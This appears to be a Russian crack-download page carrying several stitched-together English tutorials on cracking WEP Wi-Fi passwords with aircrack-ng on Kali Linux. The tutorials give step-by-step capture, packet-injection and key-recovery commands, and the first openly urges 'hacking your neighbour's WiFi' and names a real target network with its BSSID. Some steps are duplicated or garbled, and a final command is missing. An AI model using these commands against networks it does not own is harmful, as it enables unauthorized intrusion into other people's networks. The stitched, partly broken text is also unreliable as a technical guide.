Уважаемый гость, на данной странице Вам доступен материал по теме: Crack Wep With Kali. Скачивание возможно на компьютер и телефон через торрент, а также сервер загрузок по ссылке ниже. Рекомендуем также другие статьи из категории «Кряки».
Средняя скорость 5972 Kb/s
> It’s easy with Aircrack-ng
You probably already know this but Kali Linux comes with a neat set of software called Aircrack-ng. This particular set of software is a godsend for us… penetration testers or ethical hackers.
Do you know how easy it is to crack WEP passwords with Kali Linux? The whole process takes about 10 to 15 minutes and usually never fails. WEP protection is outdated and weak. Kali Linux running Aircrack-ng makes short work of it. A few commands here and a few commands there and you have the WEP password of your neighbour in your hands. Make sure you put the WEP password to good use of course.
So, let’s begin hacking your neighbour’s WiFi’s WEP password!
> Cracking WEP passwords using Kali Linux
- Open up a Terminal window.
- Enter: airmon-ng
- Note down the interface on which you want to start the monitoring. In my case it is wlan0 so I will be using wlan0.
- Enter: airmon-ng start wlan0If the result looks like this: then your card is in monitor mode.
- Note down the monitoring interface’s name (“monitor mode enabled on mon0 “). In my case it is mon0 so I will be using mon0.
- Enter: airodump-ng mon0
- My target is “mtnl” which is using WEP encryption and authentication. Wifi “mtnl” is working on channel 4 and BSSID (or bssid) is 0C:D2:B5:03:43:68. I will be using this information. Enter: airodump-ng –w mtnl-org –c 4 –bssid 0C:D2:B5:03:43:68 mon0
- After about 15,000 packets have been captured, enter: aircrack-ng mtnl-org-01.capto start cracking the WEP password.
Well… that was pretty painless. The whole process may have taken around 10 minutes for me but it may vary for you. The rate of capture of packets largely depends on the network and the signal strength. Now you have your neighbour’s Wifi’s WEP password in your hands. What will you do with it?
Today we are going to take a closer look at the vulnerabilities in the WEP (Wired Equivalent Privacy) protocol and see how to exploit those vulnerabilities and how hackers can gain access to a Wi-Fi network they don’t already have access to. We will be using the aircrack-ng software to facilitate the attack from a Kali Linux installation, but I wanted to point out a few caveats, warnings, and explanations before we dig into the demonstration.
First of all, you should note that some of the attack process is similar to cracking the WPA and WPA2 Wi-Fi protocols. However, WEP is a different protocol altogether, so past starting the software on a wireless interface and performing the dumps, the process is a little different. In addition, you should note that we are not going to be taking advantage of a handshaking and reconnection flaw and performing a dictionary-based attack as we did with WPA. Instead, we are going to monitor wireless data and capture packets to deduce the key based on some well-known vulnerabilities.
WEP Vulnerabilities vs WPA Vulnerabilities
Before we begin the WEP cracking demonstration, you should have a general understanding of the protocol, its vulnerabilities, and how they differ from WPA and WPA2. First off, you should understand that WEP is a security protocol that uses RC4 security which is a type of stream cipher. The cipher uses a short key to generate a ‘random’ key stream, but this technology has been exploited for years.
There are several ways that WEP vulnerabilities can be exploited. One way that it is commonly attacked is by comparing two streams that used cipher-texts with identical key streams. By using an XOR operation (Exclusive Or) on the data, the protocol can be reverse engineered.
One of the fatal flaws in the protocol revolve around the CRC-32 checksum that is used to ensure that data hasn’t been changed in transit – otherwise known as an integrity check. By changing the bits and editing the checksum to a valid permutation, it is possible to fool the RC4 stream data into appearing valid. However, this is just the tip of the iceberg regarding WEP vulnerabilities, and you should know that these security flaws give rise to both passive and active attacks.
Conversely, WPA suffers from a security vulnerability related to TKIP (Temporal Key Integrity Protocol). These flaws make WPA and WPA2 vulnerable to packet spoofing, decryption, and brute force attacks. While the underlying mechanics of WEP and WPA are very different, you’ll find that you can crack either protocol in a matter of minutes (usually) by using the aircrack-ng software on Kali.
One of the key differences between our attacks is how we attack the protocol. In the WPA and WPA2 tutorial, we used a dictionary of passwords to find the key. This time, however, we are going to be intercepting wireless packets out of the air with aircrack-ng (though there are many other types of packet sniffers) to discover the key data.
Passive attacks are facilitated by a wiretapping technique that allows an attacker to intercept wireless communications until they spot an ICV collision. Then, the attacker can use software to deduce the contents of the data. Because of the flaws in the RC4 algorithm, an attacker can relatively easily gather data and cross-check that data to decrypt messages and even gain network access.
Conversely, and active attack can be used when an attacker already knows the plaintext data for an encrypted message. Then, the attacker can manually craft additional encrypted packets to fool the WEP device. Because they know how to manipulate the hashing algorithm, they can fool the integrity checks, causing the WEP device to erroneously accept the packets as valid data. This is a type of injection attack, and they are surprisingly easy to carry out.
Before you begin, you are going to need several things to build an environment where you can begin hacking. As always, you should know that you don’t have the legal right to misuse this information in public to attack real-life networks, so you should only attempt this exploit in the privacy of your home network. You are going to need the following five items before we can begin:
- A computer system running Kali Linux
- A wireless router using WEP that you own and control
- The aircrack-ng software
- A wireless interface that can be run in monitor mode to collect packets
- Another wireless host connected to the router
Make sure your wireless card is seen in your Kali Linux system. You can run the ifconfig command to look for wireless interfaces. You should see an Ethernet and loopback interface, but we are interested in the interface that starts with a ‘w.’ Likely, the wireless interface you want to use will be wlan0 unless you have multiple wireless cards.
Next, we are going to use aircrack-ng to put your wireless interface into monitor mode, which will allow it to monitor and capture wireless frames from other devices to facilitate the attack. You will need to run the following command:
- aircrack-ng start wlan0
Note that you may have a wireless interface with a different name. If your interface’s name is wlan1 or it has a different name, append it to the end of the command. Make special note of the output, because it will create a listening interface, likely named mon0.
Then we will start using the dump command to grab packets from other wireless devices, and the software will be able to make calculations and comparisons among the data to break the insecure WEP protocol. Enter the following command:
- airodump-ng mon0
Now it is time to tell your wireless interface to start storing captured wireless data based on the network of your choosing. Remember to plug in three key pieces of information from the previous output into the following command:
- airodump-ng –w [ESSID] –c [Channel] –bssid [BSSID] mon0
More specifically, you will need to plug in the ESSID, the channel number (CH), and the BSSID. By now your wireless interface should be capturing wireless frames, but you are going to need to store them in a local file. You will want to have at least 10,000 packets before you move on to the remaining steps. Use the following command to write your data to a file on your hard drive:
- airodump-ng mon0 –[file-name]
Last but not least, you are going to need to do the most important step of the process by actually using the captured data from the WEP device. Issue the following command:
- aircrack-ng [file-name].cap
If all goes according to plan, you should be able to break the WEP system. However, if the command fails, you will want to wait until your wireless card captures more data. Give it time to capture 15,000 packets and then try again.
Caveats and Differences from WPA
You’ll probably note that the attack procedure has fewer steps than the WPA/WPA2 attack procedure. While it may seem simpler on the surface, you should know that the WEP attack process revolves around capturing data transmitted by other wireless hosts. If there is only one host connected to the network or hosts aren’t sending much data, it will take longer to gather enough data for the attack to work. On the other hand, the WPA/WPA2 attack centered around using a dictionary of passwords after forcing a host to reconnect.
It is a simple matter to break WEP encryption provided you have the right tools, but be warned. You shouldn’t ever abuse this knowledge. Doing so could lead to severe consequences that negatively impact your life. Make sure that you only attempt these attacks on devices that you own, and make sure that you never use WEP to secure your wireless access points and routers.
This is a multiple part series for someone new to wireless hacking, with pictures and videos.
Kali Linux and WEP Hacking
WEP is the original widely used encryption standard on routers. WEP is notoriously easy to hack. Even though WEP is rarely seen anymore it still does pop up every now and again.
Penetration Testing Setup
Setup a old router and log into it setting it up as WEP for wireless security to use as a test router. Have one other computer, tablet, or smartphone connected to it wirelessly since the encrypted data between the two will need to be captured.
Open a terminal window by pressing the terminal icon at the top left.
Next type in the command “airmon-ng” without the quotes to see if your adapter is seen by Kali Linux. It should show the interface, chipset, and driver. If it doesn’t then some troubleshooting will have to be done as to why the adapter is not seen.
Next type in “airmon-ng start wlan0” to set the USB adapter into monitor mode.
(If a adapter comes up enabled on mon1 or mon2 simply used that instead of mon0)
For me this would be:
airodump-ng -w dlink -c 6 –bssid 00:26:5A:F2:57:2B mon0
Change the file name, channel, and bssid to match your test router. Copy the information from the first terminal window. Copy and pasting the BSSID into the new terminal window is much quicker then typing it for most.
airodump-ng -w (ESSID) -c (channel) –bssid (BSSID) mon0
After this is done correctly a window will come up and show information about the target router. The main feedback we need to watch is the Beacons and the Data.
To speed up the IV’s open a third terminal window letting the second run capturing the data. In the new terminal window the aireplay-ng command will be used in a two part process first use the command “aireplay-ng -1 0 -a (BSSID) mon0”. So for this example it would be aireplay-ng -1 0 -a 00:26:5A:F2:57:2B mon0
After this run the command “airplay-ng -3 -b (BSSID) mon0” for this example it would be the following:
aireplay-ng -3 -b 00:26:5A:F2:57:2B mon0
To use aircrack-ng we need the data file being written to the hard drive. In this example it is dlink. Open a new terminal window and type the command “ls” to see the file. The one aircrack-ng needs is the .CAP file here it is called “dlink-01.cap”.
To start aircrack-ng run the command “aircrack-ng (file name)” so here that would be
Aircrack will begin to run and start to crack the password. Here is what is what it looks like when it is done.
After “Key Found” it shows the password in hexadecimal or ASCII they are the same and either one can be used. For this example the password on the router was 12345.